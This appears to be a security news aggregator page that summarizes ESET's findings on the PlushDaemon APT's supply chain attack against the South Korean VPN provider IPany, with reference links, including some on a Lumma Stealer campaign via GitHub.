  • Virus Bulletin: Trend Micro researchers dissect the tactics, techniques and procedures (TTPs) employed by a campaign distributing Lumma Stealer through GitHub.
  • ciso2ciso.com: Lumma Stealer Detection: Sophisticated Campaign Using GitHub Infrastructure to Spread SectopRAT, Vidar, Cobeacon, and Other Types of Malware – Source: socprime.com
  • www.trendmicro.com: Trend Micro : Trend Micro reports on a campaign distributing Lumma stealer through GitHub.
  • gbhackers.com: Cybercriminals Exploit GitHub Infrastructure to Distribute Lumma Stealer
  • gbhackers.com: Cybercriminals Exploit GitHub Infrastructure to Distribute Lumma Stealer
CISO2CISO Editor 2@ciso2ciso.com - 36d

PlushDaemon APT Hits VPN Provider Via Supply Chain - A China-aligned APT group, PlushDaemon, is conducting cyber espionage using a supply chain attack by replacing legitimate software installers with malicious ones deploying the SlowStepper malware.
A new China-aligned cyber espionage group named PlushDaemon has been discovered conducting a supply chain attack against a South Korean VPN provider, IPany. The group compromised the VPN provider's software installer, replacing it with a malicious version that deploys the custom SlowStepper malware. This malware is a sophisticated backdoor with a large toolkit composed of around 30 modules, programmed in C++, Python, and Go, designed for espionage activities. The initial access vector for the group is typically by hijacking legitimate software updates of Chinese applications, but this supply chain attack marks a significant departure from their usual tactics.

ESET Research identified the attack after detecting malicious code in a Windows NSIS installer downloaded from the IPany website in May 2024. The compromised installer included both the legitimate VPN software and the SlowStepper backdoor. ESET researchers notified IPany, and the malicious installer has since been removed. PlushDaemon, active since at least 2019, is believed to be the exclusive user of the SlowStepper malware and has targeted individuals and entities in China, Taiwan, Hong Kong, South Korea, the US, and New Zealand. The group is also known to gain access via vulnerabilities in legitimate web servers.

Recommended read:
References :
  • ciso2ciso.com: PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack.
  • BleepingComputer: South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group
  • : ESET Research : A previously unknown China-aligned APT dubbed PlushDaemon conducts cyberespionage and is responsible for a supply-chain attack against a VPN provider in South Korea.
  • ciso2ciso.com: Details about the Chinese threat group PlushDaemon.
  • www.welivesecurity.com: A previously unknown China-aligned APT dubbed PlushDaemon conducts cyberespionage and is responsible for a supply-chain attack against a VPN provider in South Korea.
  • ciso2ciso.com: Chinese cyberspies target South Korean VPN in supply chain attack aimed at deploying a custom backdoor to collect data for cyber-espionage purposes.
  • www.bleepingcomputer.com: South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group, who compromised the company's VPN installer to deploy the custom 'SlowStepper' malware.
  • discuss.privacyguides.net: The attackers replaced the legitimate installer with one that also deployed the group’s signature backdoor.
  • therecord.media: Chinese hackers target Korean VPN provider by placing backdoored installer on website
  • ciso2ciso.com: ESET researchers discovered a previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon, which has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023.
  • go.theregister.com: Supply chain attack hits Chrome extensions, could expose millions

Blogs

Research Tools